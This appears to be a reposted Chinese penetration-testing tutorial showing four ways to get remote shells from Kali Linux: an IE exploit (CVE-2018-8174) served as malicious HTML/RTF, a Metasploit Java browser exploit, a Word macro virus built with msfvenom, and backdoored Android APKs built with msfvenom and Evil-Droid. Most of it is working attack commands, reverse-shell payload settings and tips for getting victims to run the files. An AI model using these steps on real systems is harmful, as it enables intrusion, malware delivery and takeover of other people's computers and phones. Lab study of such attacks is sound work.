IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 移动开发 -> 利用0day-java环境-宏感染-安卓客户端进行渗透 -> 正文阅读

[移动开发]利用0day-java环境-宏感染-安卓客户端进行渗透

一、利用 0DAY 漏洞 CVE-2018-8174 获取 shell

0DAY 漏洞最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他 内容的。0day 中的 0 表示 zero,早期的 0day 表示在软件发行后的 24 小时内就出现破解版本,现在我 们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫 0day。 0day 是一个统称,所有的破解都可以叫 0day。

CVE-2018-8174 漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打 开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在 2018 年 4 月 20 日早上 确认此漏洞,并于 2018 年 5 月 8 号发布了官方安全补丁,对该 0day 漏洞进行了修复,并将其命名为 CVE-2018-8174。

1、安装 CVE-2018-8174_EXP

这里给出利用CVE-2018-8174_EXP的github地址

https://github.com/Yt1g3r/CVE-2018-8174_EXP

在kali上git下来

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

2、生成恶意 html 文件

打开readme文件,查看具体使用方式

在CVE-2018-8174_EXP目录下执行命令

python CVE-2018-8174.py -u http://IP地址/exploit.html -o exp.rtf -i IP -p 端口

?注意文件是生成在当前目录,我们需要把它移到apache服务的目录下

mv exploit.html exp.rtf /var/www/html 

打开apache服务

systemctl start apache2

使用metasploit打开监听

msfdb run
use exploit/multi/handlerd
set lhost IP地址
set payload windows/shell/reverse_tcp
run

在Windows7中用IE浏览器打开网站

http://IP/exploit.html

?

?此时kali已拿到了目标的管理员权限

二、基于 java 环境的漏洞利用获取 shell

使用kali打开metasploit监听

use exploit/multi/browser/java_jre17_driver_manager
run

?在Windows7上安装对应的JAVA版本

这里给出相应地Java安装包

jre-7u17-windows-i586-系统安全文档类资源-CSDN下载

安装过程不多赘述,按照默认选项安装即可。

安装完成后,按照kali上的地址在浏览器中访问

?访问后出现如此界面

?选择LATER, 如果选择UPDATE,漏洞将被修复。

?跳转后,勾选“接受”,然后选择运行,如果取消就不会获得权限

运行后,kali已经获得了win7的权限

?三、利用宏感染 word 文档获取 shell

使用msfvenom生成宏病毒

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -e x86/shikata_ga_nai -i 10 -f vba-exe

?复制红框中的内容,这是宏语言的内容

?

?新建一个word文档,打开“视图”工具栏,选择“宏”

?填写“宏名”后,选择“创建”

?

?将复制的内容粘贴到代码框中

?保存后返回word文档,将payload内容粘贴到word文档中

红线一下都是

?粘贴后保存关闭,再双击打开该文件,kali已经得到了管理员权限

?四、安卓客户端渗透

通过 MSF 生成一个 apk 的后门应用

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 R > hack.apk

将它移到/var/www/html/目录下

mv hack.apk /var/www/html/

再Windows上下载,并在模拟器中安装再打开,kali即可获得权限

?当然也可以下载到自己手机中,部分功能可用

给程序安装后门

首先禁用IPv6

echo "net.ipv6.conf.eth0.disable_ipv6 = 1" >> /etc/sysctl.conf
sysctl -p

打开evil-droid文件

这里给大家准备了压缩包https://download.csdn.net/download/m0_47510703/78552314

cd Evil-Droid-master

我们需要修改一下evil-droid文件才能正常使用

vim evil-droid

修改第40行将“google.com”改为"baidu.com"

修改第649行将“-fa monaco”删去

退出保存即可。

然后为该文件添加执行去权限

chmod +x evil-droid

还要将tools文件夹下的apktool.jar替换为高版本

cp apktool_2.6.0.jar Evil-Droid-master/tools/apktool.jar

然后即可执行evil-droid文件

./evil-droid

它会自动为你下载需要的依赖,如果没有进行下载请更换一下源

选择3 ,IP地址和端口以及软件名称自定义即可,payload选择如下

?然后选择需要使用的安装包即可

完成后会提示你apk所在的位置

?点击“确定”后,会跳出如下界面,可以选择“确定”,也可以在msf中监听,这里我选择“exit”

?我们再将安装包移到apache服务下,并再次开启apache

evil-droid结束后会自动关闭apache服务一定要再次手动开启

mv evilapk.apk /var/www/html
systemctl start apache2

下载好后,打开,kali'上即获得了对应权限

  移动开发 最新文章
Vue3装载axios和element-ui
android adb cmd
【xcode】Xcode常用快捷键与技巧
Android开发中的线程池使用
Java 和 Android 的 Base64
Android 测试文字编码格式
微信小程序支付
安卓权限记录
知乎之自动养号
【Android Jetpack】DataStore
上一篇文章      下一篇文章      查看所有文章
加:2022-02-01 20:43:51  更:2022-02-01 20:45:44 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 13:28:59-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码